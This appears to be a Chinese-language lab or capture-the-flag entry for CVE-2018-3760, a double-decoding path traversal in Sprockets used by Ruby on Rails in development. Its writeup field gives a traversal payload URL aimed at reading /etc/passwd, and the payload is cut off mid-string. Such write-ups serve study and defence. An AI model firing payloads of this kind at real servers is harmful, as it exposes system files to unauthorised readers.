CVE-2018-3760
| ID: | 16980 |
|---|---|
| 标题: | CVE-2018-3760 |
| 描述: | Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 |
| 类型: | 目录遍历漏洞 |
| 网站: | cyberstrikelab |
| 题目链接: | https://www.cyberstrikelab.com/ |
| 赛事: | cyberstrikelab |
| 年度: | 2018 |
| Flag值: | 无 |
| writeup: | 验证后的网址 CVE-2018-3760漏洞利用成功读取/etc/passwd文件的Payload为:`/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%25 |